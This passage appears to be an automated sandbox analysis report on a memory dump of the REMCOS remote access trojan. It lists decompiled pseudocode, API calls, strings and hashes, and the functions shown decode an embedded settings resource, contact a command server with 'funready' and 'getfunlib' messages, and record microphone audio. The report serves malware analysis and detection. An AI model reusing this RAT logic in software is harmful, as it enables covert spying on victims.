                                          • freopen.MSVCRT ref: 0040FB2C
                                          • printf.MSVCRT ref: 0040FBD5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ConsoleWindow$AllocShowfreopenprintf
                                          • String ID: * Breaking-Security.Net$ * REMCOS v$1.7 Pro$CONOUT$
                                          • API String ID: 758035570-4154014664
                                          • Opcode ID: 85a77a9c2555b3fe81e500512262144cb936832edbba782d647d7bbe067822b6
                                          • Instruction ID: 2f2b88ad7b218c54194607ff57f3a4bae2920d7697a65db163e517dfa2cb7a2b
                                          • Opcode Fuzzy Hash: 85a77a9c2555b3fe81e500512262144cb936832edbba782d647d7bbe067822b6
                                          • Instruction Fuzzy Hash: 6D212832B0020C1BCB299B7DDCA45EE7A9BA7C4251B94817EF90BD73D0DEB04D888608
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E00407C53(intOrPtr _a4) {
                                          				unsigned int _v8;
                                          				signed char* _v12;
                                          				char _v13;
                                          				void* _v20;
                                          				void* _v24;
                                          				char _v40;
                                          				void* _v56;
                                          				char _v1092;
                                          				void* _t36;
                                          				signed int _t38;
                                          				signed int _t42;
                                          				signed int _t44;
                                          				int _t51;
                                          				signed int _t54;
                                          				signed int _t55;
                                          				signed int _t66;
                                          				signed char* _t76;
                                          				void* _t83;
                                          				void* _t88;
                                          				void* _t89;
                                          
                                          				_v12 = _v12 & 0x00000000;
                                          				_v8 = E00408150( &_v12);
                                          				_t51 =  *_v12 & 0x000000ff;
                                          				_t36 = malloc(_t51);
                                          				_t76 = _v12;
                                          				_t54 = _t51;
                                          				_t7 = _t76 + 1; // 0x1
                                          				_t88 = _t7;
                                          				_v24 = _t36;
                                          				_t55 = _t54 >> 2;
                                          				memcpy(_t36, _t88, _t55 << 2);
                                          				_t38 = memcpy(_t88 + _t55 + _t55, _t88, _t54 & 0x00000003);
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t38, _t51,  &_v13);
                                          				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t38);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				_v8 = _v8 + (_t38 | 0xffffffff) - _t51;
                                          				_t83 = malloc(_v8);
                                          				_t42 = _v12;
                                          				_v20 = _t83;
                                          				_t20 = _t42 + 1; // 0x1
                                          				_t89 = _t51 + _t20;
                                          				_t66 = _v8 >> 2;
                                          				_t44 = memcpy(_t83, _t89, _t66 << 2);
                                          				_t22 =  &_v24; // 0x407464
                                          				memcpy(_t89 + _t66 + _t66, _t89, _t44 & 0x00000003);
                                          				E004028EB( &_v1092,  *_t22, _t51);
                                          				E00402A2A( &_v1092,  &_v40, _v20, _v8);
                                          				free(_v20);
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v40);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return _a4;
                                          			}

                                          APIs
                                            • Part of subcall function 00408150: FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 0040815E
                                            • Part of subcall function 00408150: LoadResource.KERNEL32(00000000,00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 00408169
                                            • Part of subcall function 00408150: LockResource.KERNEL32(00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 00408170
                                            • Part of subcall function 00408150: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 0040817B
                                          • malloc.MSVCRT ref: 00407C76
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00407CA2
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407CAE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407CB7
                                          • malloc.MSVCRT ref: 00407CC8
                                            • Part of subcall function 00402A2A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,?,dt@,00000000), ref: 00402A40
                                            • Part of subcall function 00402A2A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402A4C
                                            • Part of subcall function 00402A2A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402A61
                                            • Part of subcall function 00402A2A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402A6A
                                          • free.MSVCRT(?,?,?,?,dt@,00000000), ref: 00407D13
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00407D21
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407D2A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@Resource$??1?$basic_string@V01@@$D@1@@malloc$??4?$basic_string@?c_str@?$basic_string@FindLoadLockSizeofV01@free
                                          • String ID: dt@
                                          • API String ID: 531887698-2366654348
                                          • Opcode ID: 986cc1e09f076ae00b03e92c541cff929956ae5efa4b9e40f25a22f0709455da
                                          • Instruction ID: e7c362bbf55d6fe362def41f57b44465b4cf4643257c8798677b0b7ff2d7c4a4
                                          • Opcode Fuzzy Hash: 986cc1e09f076ae00b03e92c541cff929956ae5efa4b9e40f25a22f0709455da
                                          • Instruction Fuzzy Hash: 7F310776A00009EFCF04DBA4D9999EEBBB9FB48315F1041A9E906A3290DA746E48DB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00402109: socket.WS2_32(00000000,00000001,00000006), ref: 00402120
                                            • Part of subcall function 00402168: connect.WS2_32(00415A30,00415A34,00000010), ref: 0040217E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,funready,00415268,00000000,?,?,?,00415988), ref: 004060A9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415988), ref: 004060C5
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00415988), ref: 004060B3
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,getfunlib,00415268,00000000,?,?,?,00415988), ref: 004060EC
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00415988), ref: 004060F6
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415988), ref: 00406108
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415988), ref: 00406111
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                            • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$?c_str@?$basic_string@?length@?$basic_string@V01@@V10@0@V10@@$D@1@@connectsocket
                                          • String ID: funready$getfunlib
                                          • API String ID: 325875447-1077912798
                                          • Opcode ID: 5fa60852b65b47e2a6ed33d628b531b91edfa84125d12b179fb2feb604901ce3
                                          • Instruction ID: 70f68d2a33a774611a59a187b4e42018cf206f473d21f4c0636caec103ff2ad2
                                          • Opcode Fuzzy Hash: 5fa60852b65b47e2a6ed33d628b531b91edfa84125d12b179fb2feb604901ce3
                                          • Instruction Fuzzy Hash: A011A571A40615A6DB04B7B1AC4BDFF726CAA85304F04093EF901761C2E9BC5958466D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,758EFF80,00415268,?,?,?,?,?,?,?,?,?,?,00408716,?), ref: 0040E6CA
                                          • time.MSVCRT ref: 0040E6E2
                                          • srand.MSVCRT ref: 0040E6EF
                                          • rand.MSVCRT ref: 0040E703
                                          • rand.MSVCRT ref: 0040E717
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00408716,?), ref: 0040E72A
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00408716,?), ref: 0040E73A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00408716,?), ref: 0040E743
                                          Strings
                                          • abcdefghijklmnopqrstuvwxyz, xrefs: 0040E6D2
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@rand$??1?$basic_string@D@1@@V01@V01@@Y?$basic_string@srandtime
                                          • String ID: abcdefghijklmnopqrstuvwxyz
                                          • API String ID: 3357298394-1277644989
                                          • Opcode ID: 61b4d72e65c601405d3fc08df9816bbbc004d5cb0974ce55ff798480f3e55148
                                          • Instruction ID: 1fb110d2ec9980bb9f4c5b47183564c597e57a5cf9685dcf05f4e26dd2d8a7df
                                          • Opcode Fuzzy Hash: 61b4d72e65c601405d3fc08df9816bbbc004d5cb0974ce55ff798480f3e55148
                                          • Instruction Fuzzy Hash: 6311CC7750011D9BCB04EBA1ED49AEF7B78EB40311F104436F901971D0DA7A9945CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 28%
                                          			E004026F2(void* __ecx, intOrPtr _a4, char _a7) {
                                          				struct _SYSTEMTIME _v20;
                                          				char _v36;
                                          				void* _v52;
                                          				char* _t24;
                                          				char* _t25;
                                          				intOrPtr _t33;
                                          				void* _t35;
                                          
                                          				_t35 = __ecx;
                                          				if( *((char*)(__ecx + 0x34)) == 0) {
                                          					return 0;
                                          				}
                                          				_t33 = _a4;
                                          				if( *0x415938 != 0 &&  *((intOrPtr*)(__ecx + 0x38)) != _t33) {
                                          					GetLocalTime( &_v20);
                                          					_t24 =  &_a7;
                                          					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [KeepAlive] ", _t24, "Timeout changed to %i\n", _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff, _t33);
                                          					_t25 =  &_v36;
                                          					L0040FC20();
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t25, _t24);
                                          					printf(_t25);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				}
                                          				 *(_t35 + 0x3c) =  *(_t35 + 0x3c) & 0x00000000;
                                          				 *((intOrPtr*)(_t35 + 0x38)) = _t33;
                                          				return 1;
                                          			}

                                          APIs
                                          • GetLocalTime.KERNEL32(?,758EFF80,00415A30,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 0040271B
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Timeout changed to %i,?,?,0040A946,?,?), ref: 00402747
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 00402752
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 0040275C
                                          • printf.MSVCRT ref: 00402763
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040276F
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402778
                                          Strings
                                          • Timeout changed to %i, xrefs: 0040273C
                                          • %02i:%02i:%02i:%03i [KeepAlive] , xrefs: 00402742
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                                          • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Timeout changed to %i
                                          • API String ID: 1710008465-867111061
                                          • Opcode ID: 808450fb4774ad14a115e835dc756668e8b689d331a4670f9e89f49d9f85dff4
                                          • Instruction ID: cc00f5fe8abc897b27b5181be741a8fd0fdef4b4223a36fb38de5ceb1cc1b4cc
                                          • Opcode Fuzzy Hash: 808450fb4774ad14a115e835dc756668e8b689d331a4670f9e89f49d9f85dff4
                                          • Instruction Fuzzy Hash: 16117B72800214BBCB509BE5DD4DEEFB7BCBB44715F144477F442A2190D6B8A584CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 28%
                                          			E00402791(void* __ecx, intOrPtr _a4, char _a7) {
                                          				struct _SYSTEMTIME _v20;
                                          				char _v36;
                                          				void* _v52;
                                          				char* _t22;
                                          				char* _t23;
                                          				void* _t30;
                                          				intOrPtr _t35;
                                          
                                          				_t30 = __ecx;
                                          				if( *((intOrPtr*)(__ecx + 0x34)) == 0) {
                                          					return 0;
                                          				}
                                          				_t35 =  *0x415938; // 0x0
                                          				if(_t35 != 0 && _a4 == 0) {
                                          					GetLocalTime( &_v20);
                                          					_t22 =  &_a7;
                                          					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [KeepAlive] ", _t22, "Disabled.\n", _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff);
                                          					_t23 =  &_v36;
                                          					L0040FC20();
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t23, _t22);
                                          					printf(_t23);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				}
                                          				 *((char*)(_t30 + 0x35)) = 1;
                                          				return 1;
                                          			}

                                          APIs
                                          • GetLocalTime.KERNEL32(?,00415A30,?,?,?,?,?,?,?,?,?,?,?,?,004022CD,00000001), ref: 004027B2
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Disabled.,?,?,?,?), ref: 004027DD
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004022CD,00000001), ref: 004027E8
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004022CD), ref: 004027F2
                                          • printf.MSVCRT ref: 004027F9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402805
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040280E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                                          • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Disabled.
                                          • API String ID: 1710008465-2552289483
                                          • Opcode ID: 3267047b5620e5403b2cf5c74a9a0aa7daad7e6dba77e29f4ce0e4a6586bfbfa
                                          • Instruction ID: 26824cefd2d391b63e7f360a9efe5498c18b65437e815fb1cf45070ddafa23bd
                                          • Opcode Fuzzy Hash: 3267047b5620e5403b2cf5c74a9a0aa7daad7e6dba77e29f4ce0e4a6586bfbfa
                                          • Instruction Fuzzy Hash: FE11A176800218BBCF50EBE4DD0D8EE77BCAA45300B008577F842A21D1DAB89A88C779
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                          • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                          • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@?c_str@?$basic_string@?length@?$basic_string@$??1?$basic_string@D@1@@V01@@
                                          • String ID: hRA$hRA
                                          • API String ID: 2647928144-3777161688
                                          • Opcode ID: 70c260e072eb46f2d6d8b5b222665c27e8336ff8b799b378cd1156fa49a8c359
                                          • Instruction ID: 2d0384a5b8d7644f76aacc237b36b5e03aa9b3646a5a52e53ad8478f9338e915
                                          • Opcode Fuzzy Hash: 70c260e072eb46f2d6d8b5b222665c27e8336ff8b799b378cd1156fa49a8c359
                                          • Instruction Fuzzy Hash: 92011A35600109ABCB04EBA8E89D8EE77B9FB84251B408179F907D7290DBB09E49CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(?,00000000,7313CB00,?,?,0040E644,?), ref: 0040EEE3
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,0040E644,?), ref: 0040EF01
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,0040E644,?), ref: 0040EF09
                                          • ?replace@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@IIPBD@Z.MSVCP60(00000000,00000000,?,?,0040E644,?), ref: 0040EF14
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0040E644,?), ref: 0040EF1E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,0040E644,?), ref: 0040EF27
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,0040E644,?), ref: 0040EF36
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,0040E644,?), ref: 0040EF3F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@V01@@$?find@?$basic_string@?length@?$basic_string@?replace@?$basic_string@D@1@@V12@
                                          • String ID: D@
                                          • API String ID: 3577381420-217608370
                                          • Opcode ID: 64957e4059d4a5a3af3f2383b2cb762eef85518bada7f33c27665136f667c68a
                                          • Instruction ID: d4362ae4465ef3a6c70cc0c136aafbc0d12dcd70d9c8d064c5fd94e1c76eb894
                                          • Opcode Fuzzy Hash: 64957e4059d4a5a3af3f2383b2cb762eef85518bada7f33c27665136f667c68a
                                          • Instruction Fuzzy Hash: 4E01A53550011EEFCF049F64EC9C9EA7B79FB44315B108464FC16972A0DB78AE55CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 47%
                                          			E00401883(CHAR* __eax, void* __eflags) {
                                          				char* _t4;
                                          				signed int _t5;
                                          				CHAR* _t10;
                                          				signed int _t11;
                                          				signed int _t19;
                                          				signed int _t20;
                                          				intOrPtr* _t26;
                                          				void* _t27;
                                          
                                          				_t27 = __eflags;
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				CreateDirectoryA(__eax, 0);
                                          				0x4151d8->wFormatTag = 1;
                                          				 *0x4151da = 1;
                                          				 *0x4151dc = 0x1f40;
                                          				 *0x4151e6 = 8;
                                          				 *0x4151e0 = 0x1f40;
                                          				 *0x4151e4 = 1;
                                          				 *0x4151e8 = 0;
                                          				_t4 = E00401289(0x415940, _t27, 0x24);
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				_t5 = atoi(_t4);
                                          				_t19 =  *0x4151dc; // 0x0
                                          				 *_t26 = 0x30008;
                                          				_t20 = _t19 * _t5 * 0x3c;
                                          				 *0x415190 = _t20;
                                          				 *0x415198 = (( *0x4151e6 & 0x0000ffff) >> 3) * _t20;
                                          				_t10 = waveInOpen(0x4151d0, 0xffffffff, 0x4151d8, E004019AA, 0, ??);
                                          				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x415198);
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				0x415160->lpData = _t10;
                                          				_t11 =  *0x415198; // 0x0
                                          				 *0x415164 = _t11;
                                          				 *0x415168 = 0;
                                          				 *0x41516c = 0;
                                          				 *0x415170 = 0;
                                          				 *0x415174 = 0;
                                          				waveInPrepareHeader( *0x4151d0, 0x415160, 0x20);
                                          				waveInAddBuffer( *0x4151d0, 0x415160, 0x20);
                                          				waveInStart( *0x4151d0);
                                          				return 0;
                                          			}

                                          APIs
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040188D
                                          • CreateDirectoryA.KERNEL32(00000000), ref: 00401894
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024), ref: 004018E2
                                          • atoi.MSVCRT ref: 004018E9
                                          • waveInOpen.WINMM(004151D0,000000FF,004151D8,004019AA,00000000), ref: 0040192C
                                          • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60 ref: 0040193F
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401947
                                          • waveInPrepareHeader.WINMM(00415160,00000020), ref: 00401982
                                          • waveInAddBuffer.WINMM(00415160,00000020), ref: 00401991
                                          • waveInStart.WINMM ref: 0040199D
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@$?resize@?$basic_string@BufferCreateDirectoryHeaderOpenPrepareStartatoi
                                          • String ID:
                                          • API String ID: 1105965448-0
                                          • Opcode ID: 1c0ea7c4ecf195e60b421314d626c75882c3edba1827f109d9b046417a45d593
                                          • Instruction ID: bf27eddb9491d6ca11d4abd4b36827af5ed132d13cec366d9f467bf0129c0db4
                                          • Opcode Fuzzy Hash: 1c0ea7c4ecf195e60b421314d626c75882c3edba1827f109d9b046417a45d593
                                          • Instruction Fuzzy Hash: D221E371E50A00FBC7469F65EC4CBDA7AA4FBC8315B50813AE905D62B0EBF94880CB4C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 91%
                                          			E0040E750(void* __ecx, void* __eflags, char* _a4, void** _a8, long _a12, signed int _a15) {
                                          				void* _v8;
                                          				char* _v12;
                                          				void* _v16;
                                          				void _v10016;
                                          				void* _t35;
                                          				void* _t36;
                                          				void* _t42;
                                          				void* _t44;
                                          				void* _t46;
                                          				void* _t49;
